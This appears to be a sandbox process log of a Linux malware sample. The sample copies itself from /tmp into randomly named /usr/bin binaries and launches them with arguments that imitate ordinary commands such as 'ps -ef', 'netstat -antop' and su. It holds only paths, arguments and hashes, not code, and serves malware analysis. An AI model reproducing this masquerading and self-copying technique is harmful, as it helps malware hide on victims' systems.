Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	/usr/bin/kigdktzeum id 6230
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:17
Start date (UTC):	20/08/2024
Path:	/usr/bin/kigdktzeum
Arguments:	-
File size:	625878 bytes
MD5 hash:	487aaa06ee19b8dfaa6a6b2eef2535e4

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	/usr/bin/mizdkrdyqj "ps -ef" 6230
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	/usr/bin/mizdkrdyqj "ls -la" 6230
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	/usr/bin/mizdkrdyqj "grep \"A\"" 6230
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	/usr/bin/mizdkrdyqj sh 6230
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	/usr/bin/mizdkrdyqj "sleep 1" 6230
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:23
Start date (UTC):	20/08/2024
Path:	/usr/bin/mizdkrdyqj
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0198a1a12f1f0963ee32aeae9384d8b

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	/usr/bin/becqudbgme su 6230
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	-
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	/usr/bin/becqudbgme ls 6230
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	-
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	/usr/bin/becqudbgme su 6230
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	-
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	/usr/bin/becqudbgme bash 6230
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	-
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	/usr/bin/becqudbgme sh 6230
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:29
Start date (UTC):	20/08/2024
Path:	/usr/bin/becqudbgme
Arguments:	-
File size:	625878 bytes
MD5 hash:	cb780d7ae3ef97f4221a67b15940a84d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	/usr/bin/sxruomujjd "ps -ef" 6230
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	-
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	/usr/bin/sxruomujjd "netstat -antop" 6230
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	-
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	/usr/bin/sxruomujjd top 6230
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	-
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:34
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	/usr/bin/sxruomujjd "ps -ef" 6230
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	-
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	/usr/bin/sxruomujjd "cat resolv.conf" 6230
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:35
Start date (UTC):	20/08/2024
Path:	/usr/bin/sxruomujjd
Arguments:	-
File size:	625878 bytes
MD5 hash:	cba8307e43bff3556880dcd526a511a5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	/usr/bin/qrabekbstr bash 6230
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	-
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	/usr/bin/qrabekbstr sh 6230
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	-
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	/usr/bin/qrabekbstr pwd 6230
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	-
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	/usr/bin/qrabekbstr top 6230
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	-
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	/usr/bin/qrabekbstr "netstat -antop" 6230
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:40
Start date (UTC):	20/08/2024
Path:	/usr/bin/qrabekbstr
Arguments:	-
File size:	625878 bytes
MD5 hash:	1975c0ca7e1b7192bccb225af16f47b5

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	/usr/bin/sotpizdssr top 6230
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	-
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	/usr/bin/sotpizdssr "route -n" 6230
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	-
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	/usr/bin/sotpizdssr "sleep 1" 6230
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	-
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	/usr/bin/sotpizdssr "ifconfig eth0" 6230
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	-
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	/usr/bin/sotpizdssr who 6230
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:46
Start date (UTC):	20/08/2024
Path:	/usr/bin/sotpizdssr
Arguments:	-
File size:	625878 bytes
MD5 hash:	60d7d2347ab3a1dd326249ca54ebfd91

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	/usr/bin/gnmftoxpza sh 6230
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	/usr/bin/gnmftoxpza "route -n" 6230
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	/usr/bin/gnmftoxpza top 6230
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:51
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	/usr/bin/gnmftoxpza gnome-terminal 6230
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	/usr/bin/gnmftoxpza su 6230
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/gnmftoxpza
Arguments:	-
File size:	625878 bytes
MD5 hash:	e0c968701ddbbebdd70eb5c8f3abeeb5

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	/usr/bin/iulapzbfpq "grep \"A\"" 6230
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	-
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	/usr/bin/iulapzbfpq ifconfig 6230
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	-
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	/usr/bin/iulapzbfpq who 6230
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	-
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	/usr/bin/iulapzbfpq gnome-terminal 6230
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	-
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	/usr/bin/iulapzbfpq "netstat -antop" 6230
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:33:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/iulapzbfpq
Arguments:	-
File size:	625878 bytes
MD5 hash:	7800f11c348419e086e37dfb8e609c16

Start time (UTC):	13:34:03
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:03
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
